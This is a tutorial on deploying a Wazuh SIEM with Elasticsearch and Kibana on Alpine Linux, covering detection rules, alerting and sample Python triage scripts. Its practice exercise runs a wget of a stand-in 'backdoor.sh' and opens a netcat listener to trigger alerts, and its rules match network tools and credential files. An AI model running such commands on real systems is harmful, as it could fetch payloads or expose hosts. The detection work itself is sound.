I'll show you how to set up SIEM (Security Information and Event Management) on Alpine Linux! SIEM helps you collect, analyze, and respond to security events across your systems. Think of it as a security camera system for your servers!
What is SIEM?
SIEM combines security information management and security event management. It's like having a security guard that watches all your systems 24/7, collecting logs, detecting threats, and alerting you to problems. Essential for any serious security setup!
Why use SIEM?
- Real-time threat detection
- Centralized log management
- Compliance reporting
- Incident investigation
- Automated responses
What You Need
Before starting, you'll need:
- Alpine Linux server (4GB+ RAM)
- Multiple systems to monitor
- Basic networking knowledge
- Storage space for logs
- About 45 minutes
Step 1: Install Wazuh SIEM
We'll use Wazuh, an open-source SIEM:
# Update system
apk update && apk upgrade
# Install dependencies
apk add curl wget git python3 py3-pip
apk add gcc g++ make linux-headers
apk add openssl openssl-dev
# Create wazuh user
adduser -D -H -s /sbin/nologin wazuh
# Download Wazuh
cd /opt
wget https://github.com/wazuh/wazuh/archive/v4.7.0.tar.gz
tar -xzf v4.7.0.tar.gz
cd wazuh-4.7.0
# Install Wazuh server
./install.sh
# Or use simpler method:
curl -so wazuh-install.sh https://packages.wazuh.com/4.7/wazuh-install.sh
chmod +x wazuh-install.sh
./wazuh-install.sh --wazuh-server wazuh-server
Step 2: Configure SIEM Components
Set up the main components:
# Configure Wazuh manager. This replaces the stock ossec.conf, so keep a copy:
# anything you still need from it (syscheck, rootcheck, active-response
# command definitions) has to be added back by hand.
cp /var/ossec/etc/ossec.conf /var/ossec/etc/ossec.conf.orig
cat > /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<global>
<jsonout_output>yes</jsonout_output>
<alerts_log>yes</alerts_log>
<logall>no</logall>
<logall_json>no</logall_json>
<email_notification>yes</email_notification>
<email_to>[email protected]</email_to>
<smtp_server>localhost</smtp_server>
<email_from>[email protected]</email_from>
</global>
<alerts>
<log_alert_level>3</log_alert_level>
<email_alert_level>12</email_alert_level>
</alerts>
<remote>
<connection>secure</connection>
<port>1514</port>
<protocol>tcp</protocol>
</remote>
<ruleset>
<decoder_dir>ruleset/decoders</decoder_dir>
<rule_dir>ruleset/rules</rule_dir>
<rule_exclude>0215-policy_rules.xml</rule_exclude>
<list>etc/lists/audit-keys</list>
</ruleset>
<auth>
<disabled>no</disabled>
<port>1515</port>
<use_source_ip>yes</use_source_ip>
<force_insert>no</force_insert>
<force_time>0</force_time>
<purge>yes</purge>
<use_password>yes</use_password>
<limit_maxagents>8000</limit_maxagents>
<ciphers>HIGH:!ADH:!EXP:!MD5:!RC4:!3DES:!CAMELLIA:@STRENGTH</ciphers>
</auth>
</ossec_config>
EOF
# Start Wazuh services
/var/ossec/bin/wazuh-control start
Step 3: Set Up Log Collection
Configure log sources:
# Configure syslog collection. Fragments appended to ossec.conf must sit inside
# their own <ossec_config> block; Wazuh reads multiple blocks, but a bare
# <localfile> after the closing tag is invalid.
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<localfile>
<log_format>syslog</log_format>
<location>/var/log/messages</location>
</localfile>
<localfile>
<log_format>syslog</log_format>
<location>/var/log/secure</location>
</localfile>
<localfile>
<log_format>apache</log_format>
<location>/var/log/nginx/access.log</location>
</localfile>
<localfile>
<log_format>apache</log_format>
<location>/var/log/nginx/error.log</location>
</localfile>
<localfile>
<log_format>command</log_format>
<command>df -P</command>
<frequency>360</frequency>
</localfile>
<localfile>
<log_format>full_command</log_format>
<command>netstat -tulpn | sed 's/\([[:alnum:]]\+\)\ \+[[:digit:]]\+\ \+[[:digit:]]\+\ \+\(.*\):\([[:digit:]]*\)\ \+\([0-9\.\:\*]\+\).\+\ \([[:digit:]]*\/[[:alnum:]\-]*\).*/\1 \2 == \3 == \4 \5/' | sort -k 4 -g | sed 's/ == \(.*\) ==/:\1/' | sed 1,2d</command>
<frequency>360</frequency>
<alias>netstat listening ports</alias>
</localfile>
</ossec_config>
EOF
# Restart to apply changes
/var/ossec/bin/wazuh-control restart
Step 4: Install Elasticsearch
Set up data storage and search:
# Install Java (the JDK bundled with the Elasticsearch tarball is built against
# glibc and does not run on Alpine's musl libc, so the packaged one is used)
apk add openjdk11-jre
# Download and install Elasticsearch
cd /opt
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.17.9-linux-x86_64.tar.gz
tar -xzf elasticsearch-7.17.9-linux-x86_64.tar.gz
mv elasticsearch-7.17.9 elasticsearch
# Configure Elasticsearch
cat > /opt/elasticsearch/config/elasticsearch.yml << 'EOF'
cluster.name: wazuh-cluster
node.name: wazuh-node-1
path.data: /var/lib/elasticsearch
path.logs: /var/log/elasticsearch
network.host: 0.0.0.0
http.port: 9200
discovery.type: single-node
xpack.security.enabled: true
xpack.security.authc.api_key.enabled: true
EOF
# Create OpenRC service (Alpine uses OpenRC, not systemd)
cat > /etc/init.d/elasticsearch << 'EOF'
#!/sbin/openrc-run
name="elasticsearch"
description="Elasticsearch"
command="/opt/elasticsearch/bin/elasticsearch"
command_user="elasticsearch:elasticsearch"
pidfile="/var/run/elasticsearch.pid"
start_stop_daemon_args="--background --make-pidfile"
# Use the Alpine OpenJDK instead of the glibc-linked bundled JDK
export ES_JAVA_HOME=/usr/lib/jvm/java-11-openjdk
depend() {
need net
}
EOF
chmod +x /etc/init.d/elasticsearch
# Create user and directories
adduser -D -H elasticsearch
mkdir -p /var/{lib,log}/elasticsearch
chown -R elasticsearch:elasticsearch /opt/elasticsearch /var/{lib,log}/elasticsearch
# Bootstrap checks are enforced because network.host is not loopback, and
# this one fails on a default kernel setting
sysctl -w vm.max_map_count=262144
echo "vm.max_map_count=262144" > /etc/sysctl.d/elasticsearch.conf
# Start Elasticsearch
rc-service elasticsearch start
rc-update add elasticsearch
# With xpack.security enabled, set the built-in user passwords once the node
# is up; Kibana needs the kibana_system one
ES_JAVA_HOME=/usr/lib/jvm/java-11-openjdk /opt/elasticsearch/bin/elasticsearch-setup-passwords interactive
Step 5: Deploy Kibana Dashboard
Install the visualization interface:
# Download Kibana
cd /opt
wget https://artifacts.elastic.co/downloads/kibana/kibana-7.17.9-linux-x86_64.tar.gz
tar -xzf kibana-7.17.9-linux-x86_64.tar.gz
mv kibana-7.17.9-linux-x86_64 kibana
# Configure Kibana
cat > /opt/kibana/config/kibana.yml << 'EOF'
server.port: 5601
server.host: "0.0.0.0"
elasticsearch.hosts: ["http://localhost:9200"]
elasticsearch.username: "kibana_system"
# replace with the kibana_system password set by elasticsearch-setup-passwords
elasticsearch.password: "changeme"
logging.dest: /var/log/kibana/kibana.log
pid.file: /var/run/kibana.pid
EOF
# Create directories and set permissions
mkdir -p /var/log/kibana
adduser -D -H kibana
chown -R kibana:kibana /opt/kibana /var/log/kibana
# Start Kibana
sudo -u kibana /opt/kibana/bin/kibana &
Step 6: Configure Agents
Set up agents on systems to monitor:
# On each system to monitor, install Wazuh agent
# For Alpine Linux:
wget https://packages.wazuh.com/4.x/alpine/wazuh-agent-4.7.0-r1.apk
apk add --allow-untrusted wazuh-agent-4.7.0-r1.apk
# Configure agent
cat > /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<client>
<server>
<address>SIEM_SERVER_IP</address>
<port>1514</port>
<protocol>tcp</protocol>
</server>
<config-profile>alpine, alpine-linux</config-profile>
<notify_time>10</notify_time>
<time-reconnect>60</time-reconnect>
<auto_restart>yes</auto_restart>
</client>
<localfile>
<log_format>syslog</log_format>
<location>/var/log/messages</location>
</localfile>
<localfile>
<log_format>command</log_format>
<command>df -P</command>
<frequency>360</frequency>
</localfile>
<localfile>
<log_format>full_command</log_format>
<command>last -n 20</command>
<frequency>360</frequency>
</localfile>
</ossec_config>
EOF
# Register agent with server. The manager config in Step 2 sets use_password,
# so enrollment also needs the password from the manager's
# /var/ossec/etc/authd.pass (placeholder below)
/var/ossec/bin/agent-auth -m SIEM_SERVER_IP -P 'AGENT_ENROLLMENT_PASSWORD'
# Start agent
/var/ossec/bin/wazuh-control start
Step 7: Create Detection Rules
Set up custom security rules:
# Create custom rules file
cat > /var/ossec/etc/rules/local_rules.xml << 'EOF'
<group name="local,syslog,">
<!-- SSH brute force detection: 5 failed logins (sid 5716) from one source IP
     within 120 s. same_source_ip only counts when frequency/timeframe are set -->
<rule id="100001" level="10" frequency="5" timeframe="120">
<if_sid>5716</if_sid>
<same_source_ip />
<description>SSH brute force attack detected</description>
<group>authentication_failures,</group>
</rule>
<!-- Suspicious commands -->
<rule id="100002" level="8">
<if_sid>5401</if_sid>
<match>wget|curl|nc|netcat</match>
<description>Suspicious command execution detected</description>
</rule>
<!-- File integrity monitoring -->
<rule id="100003" level="12">
<if_sid>550</if_sid>
<match>/etc/passwd|/etc/shadow</match>
<description>Critical file modified</description>
</rule>
<!-- Port scan detection -->
<rule id="100004" level="10">
<if_sid>5601</if_sid>
<same_source_ip />
<description>Port scan detected</description>
</rule>
<!-- Privilege escalation -->
<rule id="100005" level="12">
<decoded_as>sudo</decoded_as>
<match>user NOT in sudoers</match>
<description>Unauthorized sudo attempt</description>
</rule>
</group>
EOF
# Test rules
/var/ossec/bin/wazuh-logtest
Step 8: Set Up Alerting
Configure alert notifications:
# Email alerts configuration. email_alerts blocks are read from ossec.conf;
# a separate file under etc/shared/ is never loaded by the manager
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<email_alerts>
<email_to>[email protected]</email_to>
<level>10</level>
<format>full</format>
</email_alerts>
<email_alerts>
<email_to>[email protected]</email_to>
<level>12</level>
<format>sms</format>
</email_alerts>
<email_alerts>
<email_to>[email protected]</email_to>
<group>authentication_success</group>
<format>reports</format>
</email_alerts>
</ossec_config>
EOF
# Slack integration. Wazuh runs custom integrations (file name must start with
# custom-) as: <script> <alert_json_file> <api_key> <hook_url>; the stock
# /var/ossec/integrations/slack must not be overwritten
apk add jq
cat > /var/ossec/integrations/custom-slack << 'EOF'
#!/bin/sh
# Slack webhook integration: $1 is the alert JSON file, $3 the webhook URL
ALERT_FILE="$1"
HOOK_URL="$3"
# Build the payload with jq so alert text cannot break out of the JSON string
PAYLOAD=$(jq -c '{text: ("Security Alert (level " + (.rule.level|tostring) + "): " + .rule.description)}' "$ALERT_FILE")
curl -s -X POST -H 'Content-type: application/json' --data "$PAYLOAD" "$HOOK_URL"
EOF
chmod 750 /var/ossec/integrations/custom-slack
chown root:wazuh /var/ossec/integrations/custom-slack
# Enable it; the level threshold is set here, not in the script
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<integration>
<name>custom-slack</name>
<hook_url>https://hooks.slack.com/services/YOUR/WEBHOOK/URL</hook_url>
<level>10</level>
<alert_format>json</alert_format>
</integration>
</ossec_config>
EOF
Step 9: Create Dashboards
Build visualization dashboards:
# Install the Wazuh Kibana plugin with kibana-plugin; unzipping by hand into
# plugins/ does not produce the directory layout Kibana expects
cd /tmp
curl -so wazuh-kibana-app.zip https://packages.wazuh.com/4.x/ui/kibana/wazuh_kibana-4.7.0_7.17.9.zip
sudo -u kibana /opt/kibana/bin/kibana-plugin install file:///tmp/wazuh-kibana-app.zip
# Restart Kibana
pkill -f kibana
sudo -u kibana /opt/kibana/bin/kibana &
# Create custom dashboard via API (security is enabled, so authenticate; the
# kbn-xsrf header is required by Kibana for any state-changing request)
curl -X POST "localhost:5601/api/saved_objects/dashboard" \
-u elastic:ELASTIC_PASSWORD \
-H "Content-Type: application/json" \
-H "kbn-xsrf: true" \
-d '{
"attributes": {
"title": "Security Overview",
"hits": 0,
"description": "Main security dashboard",
"panelsJSON": "[{\"gridData\":{\"x\":0,\"y\":0,\"w\":24,\"h\":15},\"type\":\"visualization\",\"id\":\"alerts-evolution\"}]",
"version": 1,
"timeRestore": false,
"kibanaSavedObjectMeta": {
"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"
}
}
}'
Practice Exercise
Try these SIEM tasks:
- Generate security events
- Create custom rules
- Build dashboards
- Test alerting
# Generate test events
# Failed SSH attempts (seq instead of {1..5}: busybox sh on Alpine has no brace
# expansion; BatchMode keeps ssh from hanging at a password prompt)
for i in $(seq 1 5); do
ssh -o BatchMode=yes -o ConnectTimeout=5 invalid@localhost 2>/dev/null
sleep 1
done
# Suspicious commands
wget http://malicious.example.com/backdoor.sh 2>/dev/null
nc -lvp 4444 &
# Check alerts
tail -f /var/ossec/logs/alerts/alerts.json | jq '.'
# View in Kibana
echo "Open browser to http://localhost:5601"
echo "Go to Wazuh plugin"
echo "Check Security Events dashboard"
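The "Check alerts" step above pipes alerts.json through jq; a first look at that file usually needs two pivots, which rules fired and which source addresses they came from. The script below, an added example that is not part of the page or of Wazuh, does that over a constructed sample of alerts.json lines (newline-delimited JSON in the field layout Wazuh uses: rule.id, rule.level, rule.description, agent.name, data.srcip). The sample values are made up, and the last line is deliberately truncated, as tail -f can show a line still being written.

```python
import json
import sys
from collections import Counter

# Constructed sample of /var/ossec/logs/alerts/alerts.json (one alert per line);
# values are invented for this example, the final line is deliberately cut off
SAMPLE_ALERTS_JSON = "\n".join([
    json.dumps({"timestamp": "2024-01-01T00:00:04.000+0000",
                "rule": {"id": "100001", "level": 10,
                         "description": "SSH brute force attack detected",
                         "groups": ["local", "syslog", "authentication_failures"]},
                "agent": {"id": "001", "name": "web-1"},
                "data": {"srcip": "203.0.113.7", "dstuser": "root"}}),
    json.dumps({"timestamp": "2024-01-01T00:00:09.000+0000",
                "rule": {"id": "100001", "level": 10,
                         "description": "SSH brute force attack detected",
                         "groups": ["local", "syslog", "authentication_failures"]},
                "agent": {"id": "001", "name": "web-1"},
                "data": {"srcip": "203.0.113.7", "dstuser": "root"}}),
    json.dumps({"timestamp": "2024-01-01T00:01:00.000+0000",
                "rule": {"id": "5402", "level": 3,
                         "description": "Successful sudo to ROOT executed",
                         "groups": ["syslog", "sudo"]},
                "agent": {"id": "002", "name": "db-1"},
                "data": {"srcuser": "alice"}}),
    json.dumps({"timestamp": "2024-01-01T00:02:00.000+0000",
                "rule": {"id": "100003", "level": 12,
                         "description": "Critical file modified",
                         "groups": ["local", "syslog"]},
                "agent": {"id": "002", "name": "db-1"},
                "syscheck": {"path": "/etc/shadow", "event": "modified"}}),
    '{"timestamp": "2024-01-01T00:03:00.000+0000", "rule": {"id": "1000',
])


def parse_alerts(text):
    """Parse newline-delimited JSON, skipping blank or truncated lines instead of
    aborting: a half-written last line is normal when reading a live file."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            alerts.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return alerts


def triage(alerts, min_level=10):
    """Count alerts at or above min_level by rule, by source IP and by agent.
    Alerts without a data.srcip (e.g. syscheck events) still count per rule/agent."""
    by_rule, by_srcip, by_agent = Counter(), Counter(), Counter()
    for alert in alerts:
        rule = alert.get("rule", {})
        if int(rule.get("level", 0)) < min_level:
            continue
        by_rule[(rule.get("id"), rule.get("description"))] += 1
        by_agent[alert.get("agent", {}).get("name", "?")] += 1
        srcip = alert.get("data", {}).get("srcip")
        if srcip:
            by_srcip[srcip] += 1
    return {"by_rule": by_rule, "by_srcip": by_srcip, "by_agent": by_agent}


def main():
    # Usage: python3 triage.py /var/ossec/logs/alerts/alerts.json  (default: sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ALERTS_JSON
    summary = triage(parse_alerts(text))
    for name, counter in summary.items():
        print(name)
        for key, count in counter.most_common():
            print(f"  {count:5d}  {key}")


if __name__ == "__main__":
    main()
```

Run it against the live file with the path as its only argument; the level threshold mirrors the level-10 cut-off used for the email and Slack alerts in Step 8, so the script counts exactly the alerts that would have paged someone.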
Troubleshooting Common Issues
Agent Connection Failed
Fix agent connectivity:
# On agent
/var/ossec/bin/agent-auth -m SIEM_SERVER_IP -p 1515
# Check agent status
/var/ossec/bin/wazuh-control status
# View agent logs
tail -f /var/ossec/logs/ossec.log
# On server, check agent list
/var/ossec/bin/manage_agents -l
# Restart agent
/var/ossec/bin/wazuh-control restart
High Memory Usage
Optimize SIEM performance:
# Adjust Elasticsearch heap. jvm.options takes raw JVM flags (not an env
# assignment), and 7.x reads overrides from config/jvm.options.d/
mkdir -p /opt/elasticsearch/config/jvm.options.d
printf '%s\n' '-Xms2g' '-Xmx2g' > /opt/elasticsearch/config/jvm.options.d/heap.options
# Limit Wazuh memory. local_internal_options.conf survives upgrades (internal_options.conf
# is overwritten); values are plain integers, the rotate interval is in seconds
cat >> /var/ossec/etc/local_internal_options.conf << 'EOF'
analysisd.min_rotate_interval=3600
analysisd.max_logs_per_second=100
monitord.rotate_log=1
EOF
# Enable log rotation
cat > /etc/logrotate.d/wazuh << 'EOF'
/var/ossec/logs/alerts/*.json {
daily
rotate 7
compress
missingok
notifempty
}
EOF
Missing Alerts
Debug alert generation:
# Test rules: feed a complete syslog line so the sshd decoder matches
echo "Jan  1 00:00:00 host sshd[1234]: Failed password for root from 192.168.1.100 port 22 ssh2" | \
/var/ossec/bin/wazuh-logtest
# Check rule loading
/var/ossec/bin/wazuh-control status
grep -i error /var/ossec/logs/ossec.log
# Verify decoders
/var/ossec/bin/wazuh-logtest -v
Pro Tips
Tip 1: Correlation Rules
Create advanced correlations:
<!-- Time-based correlation -->
<rule id="100010" level="14" frequency="5" timeframe="60">
<if_matched_sid>100001</if_matched_sid>
<same_source_ip />
<description>Multiple SSH brute force attempts</description>
</rule>
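Rule 100001 in Step 7 and rule 100010 above are both frequency/timeframe rules keyed on the source IP: the first counts sshd failures, the second counts firings of the first. The simulation below is an added example, not code from the page or from Wazuh, and it models that semantics in a simplified way (a per-source sliding window that resets once the rule fires; Wazuh's exact counter reset and ignore behaviour is not reproduced). It runs the two-stage chain over constructed sshd lines: 25 failures from one address in 25 seconds, plus one stray failure from another.

```python
import re
from collections import defaultdict, deque

# Constructed sshd lines (not from the page) in the form they take in /var/log/secure,
# as (epoch_seconds, line) pairs
SAMPLE_EVENTS = [
    (t, f"Jan  1 00:00:{t:02d} host sshd[4242]: Failed password for root "
        f"from 203.0.113.7 port {50000 + t} ssh2")
    for t in range(25)
] + [
    (5, "Jan  1 00:00:05 host sshd[4243]: Failed password for root "
        "from 198.51.100.9 port 50100 ssh2"),
]

# The event Wazuh's sid 5716 represents; only the source address matters here
FAILED_RE = re.compile(r"Failed password for \S+ from (?P<srcip>\d+\.\d+\.\d+\.\d+)")


class CorrelationRule:
    """Simplified model of <rule frequency=N timeframe=T> with <same_source_ip/>:
    fire when N matching events from one source IP arrive within T seconds."""

    def __init__(self, rule_id, level, frequency, timeframe):
        self.rule_id = rule_id
        self.level = level
        self.frequency = frequency
        self.timeframe = timeframe
        self.window = defaultdict(deque)  # srcip -> timestamps of recent matches

    def feed(self, ts, srcip):
        q = self.window[srcip]
        q.append(ts)
        while q and ts - q[0] > self.timeframe:  # drop matches outside the window
            q.popleft()
        if len(q) >= self.frequency:
            q.clear()  # one burst yields one alert (simplification of Wazuh's reset)
            return True
        return False


def run_pipeline(events):
    """Chain from the page: 100001 (5 failures / 120 s) feeds 100010 (5 hits / 60 s).
    Returns (ts, rule_id, srcip) for every alert raised."""
    r100001 = CorrelationRule("100001", 10, frequency=5, timeframe=120)
    r100010 = CorrelationRule("100010", 14, frequency=5, timeframe=60)
    alerts = []
    for ts, line in sorted(events):
        m = FAILED_RE.search(line)
        if not m:
            continue  # not an sshd failure: never reaches rule 100001
        srcip = m.group("srcip")
        if r100001.feed(ts, srcip):
            alerts.append((ts, r100001.rule_id, srcip))
            # if_matched_sid: only alerts of 100001 are counted by 100010
            if r100010.feed(ts, srcip):
                alerts.append((ts, r100010.rule_id, srcip))
    return alerts


if __name__ == "__main__":
    for ts, rule_id, srcip in run_pipeline(SAMPLE_EVENTS):
        print(f"t={ts:3d}s  rule {rule_id}  srcip={srcip}")
```

With this input rule 100001 fires at t=4, 9, 14, 19 and 24 seconds, and the fifth firing is what trips rule 100010, which is why the level-14 alert appears only once; the single failure from 198.51.100.9 never reaches the threshold, which is the point of keying the counter on the source address.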
Tip 2: Threat Intelligence
Integrate threat feeds:
# Download threat intelligence list and convert it to CDB format (one "key:" per line)
wget https://rules.emergingthreats.net/blockrules/compromised-ips.txt
sed 's/\r$//; s/$/:/' compromised-ips.txt > /var/ossec/etc/lists/compromised-ips
# Register the list with the ruleset (the <list> entry belongs in <ruleset>)
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<ruleset>
<list>etc/lists/compromised-ips</list>
</ruleset>
</ossec_config>
EOF
# Create rule using list (rules must sit inside a <group>)
cat >> /var/ossec/etc/rules/local_rules.xml << 'EOF'
<group name="local,">
<rule id="100020" level="12">
<list field="srcip" lookup="address_match_key">etc/lists/compromised-ips</list>
<description>Connection from known compromised IP</description>
</rule>
</group>
EOF
/var/ossec/bin/wazuh-control restart
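A one-line sed turns a clean feed into CDB lines, but real feeds carry comment lines, CRLF endings, duplicates and the occasional malformed entry, any of which ends up as a bad key. The converter below is an added example (not from the page or from Wazuh) that validates each line as an IPv4 address before emitting the "address:" form the list above uses, deduplicates, and reports what it dropped. The feed text is constructed for the example; the emergingthreats file itself is not reproduced.

```python
import ipaddress
import sys

# Constructed sample feed (not the real emergingthreats file): one address per
# line plus the comments, CRLF endings, duplicates and junk a real feed may carry
SAMPLE_FEED = (
    "# Compromised hosts, updated daily\r\n"
    "203.0.113.7\r\n"
    "198.51.100.9\n"
    "203.0.113.7   # seen again\n"
    "not-an-ip\n"
    "2001:db8::1\n"
    "\n"
)


def to_cdb_entries(feed_text):
    """Convert a plain IP list into Wazuh CDB lines ('key:value' with an empty value).
    Returns (entries, skipped): only valid IPv4 host addresses are kept, each once,
    so a single bad line cannot poison the whole list. IPv6 is not handled here."""
    seen, entries, skipped = set(), [], 0
    for raw in feed_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments and whitespace
        if not line:
            continue
        try:
            addr = ipaddress.ip_address(line)
        except ValueError:
            skipped += 1  # malformed entry: better dropped than stored as a key
            continue
        if addr.version != 4:
            skipped += 1
            continue
        key = str(addr)
        if key in seen:
            continue  # duplicate keys only bloat the list
        seen.add(key)
        entries.append(f"{key}:")
    return entries, skipped


def write_cdb(entries, path):
    """Write the list file; Wazuh compiles it on restart."""
    with open(path, "w") as fh:
        fh.write("\n".join(entries) + "\n")
    return len(entries)


def main():
    # Usage: python3 feed2cdb.py compromised-ips.txt /var/ossec/etc/lists/compromised-ips
    if len(sys.argv) == 3:
        feed = open(sys.argv[1]).read()
        entries, skipped = to_cdb_entries(feed)
        written = write_cdb(entries, sys.argv[2])
        print(f"wrote {written} entries to {sys.argv[2]}, skipped {skipped} bad lines")
    else:
        entries, skipped = to_cdb_entries(SAMPLE_FEED)
        print("\n".join(entries))
        print(f"# skipped {skipped} line(s)", file=sys.stderr)


if __name__ == "__main__":
    main()
```

Reporting the skipped count matters operationally: a feed that suddenly yields zero entries or hundreds of rejects is a sign the upstream format changed, and silently loading an empty list would turn rule 100020 off without any alert.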
Tip 3: Automated Response
Set up active responses:
# firewall-drop needs iptables, and the <command> definition is included because
# the Step 2 config replaced the stock ossec.conf that normally defines it
apk add iptables
cat >> /var/ossec/etc/ossec.conf << 'EOF'
<ossec_config>
<command>
<name>firewall-drop</name>
<executable>firewall-drop</executable>
<timeout_allowed>yes</timeout_allowed>
</command>
<active-response>
<command>firewall-drop</command>
<location>local</location>
<level>10</level>
<timeout>600</timeout>
</active-response>
</ossec_config>
EOF
SIEM Best Practices
- Log Everything Important
  - Authentication events
  - System changes
  - Network connections
  - Application logs
- Tune Your Rules
  - Start with defaults
  - Add custom rules gradually
  - Reduce false positives
  - Test before production
- Regular Maintenance
  - Archive old logs
  - Update threat feeds
  - Review dashboards
  - Test alerts monthly
- Incident Response
  - Document procedures
  - Automate where possible
  - Regular drills
  - Learn from incidents
What You Learned
Excellent work! You can now:
- Install and configure SIEM
- Collect logs from multiple sources
- Create detection rules
- Set up alerting
- Build security dashboards
Your security monitoring is now professional-grade!
What's Next?
Now that SIEM is running, explore:
- Advanced threat hunting
- Security orchestration (SOAR)
- Compliance reporting
- Machine learning detection
Keep monitoring and stay secure!